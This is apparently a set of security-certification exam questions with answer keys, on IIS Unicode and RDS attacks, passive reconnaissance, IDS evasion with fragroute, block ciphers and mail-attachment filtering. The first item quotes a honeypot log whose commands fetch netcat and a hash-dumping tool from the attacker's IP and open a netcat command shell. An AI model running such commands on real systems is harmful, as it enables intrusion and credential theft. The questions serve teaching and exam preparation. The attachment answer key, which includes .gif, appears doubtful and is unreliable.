- (Topic 14)
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom” “cmd1.exe /c echo johna2k >>ftpcom” “cmd1.exe /c echo haxedj00 >>ftpcom” “cmd1.exe /c echo get nc.exe >>ftpcom” “cmd1.exe /c echo get samdump.dll >>ftpcom” “cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp –s:ftpcom”
“cmd1.exe /c nc –l –p 6969 e-cmd1.exe”
What can you infer from the exploit given?

1. A. It is a local exploit where the attacker logs in using username johna2k.
2. B. There are two attackers on the system – johna2k and haxedj00.
3. C. The attack is a remote exploit and the hacker downloads three files.
4. D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Correct Answer: C

- (Topic 2)
A very useful resource for passively gathering information about a target company is:

1. A. Host scanning
2. B. Whois search
3. C. Traceroute
4. D. Ping sweep

Correct Answer: B
A, C & D are "Active" scans, the question says: "Passively"

- (Topic 19)
Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a detection engine and rely on the pattern matching and/or statistical analysis to determine what is malicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyze traffic the host would otherwise discard. Which of the following tools allows an attacker to intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly assembled by the host TCP/IP stack to render the attack payload?

1. A. Defrag
2. B. Tcpfrag
3. C. Tcpdump
4. D. Fragroute

Correct Answer: D
fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behaviour. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls, and basic TCP/IP stack behaviour.

- (Topic 21)
_____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length.

1. A. Bit Cipher
2. B. Hash Cipher
3. C. Block Cipher
4. D. Stream Cipher

Correct Answer: C
A block cipher is a symmetric key cipher which operates on fixed-length groups of bits, termed blocks, with an unvarying transformation. When encrypting, a block cipher might take a (for example) 128-bit block of plaintext as input, and output a corresponding 128-bit block of ciphertext.

- (Topic 23)
You are configuring the security options of your mail server and you would like to block certain file attachments to prevent viruses and malware from entering the users inbox.
Which of the following file formats will you block?
(Select up to 6)

1. A. .txt
2. B. .vbs
3. C. .pif
4. D. .jpg
5. E. .gif
6. F. .com
7. G. .htm
8. H. .rar
9. I. .scr
10. J. .exe

Correct Answer: BCEFIJ
http://office.microsoft.com/en-us/outlook/HP030850041033.aspx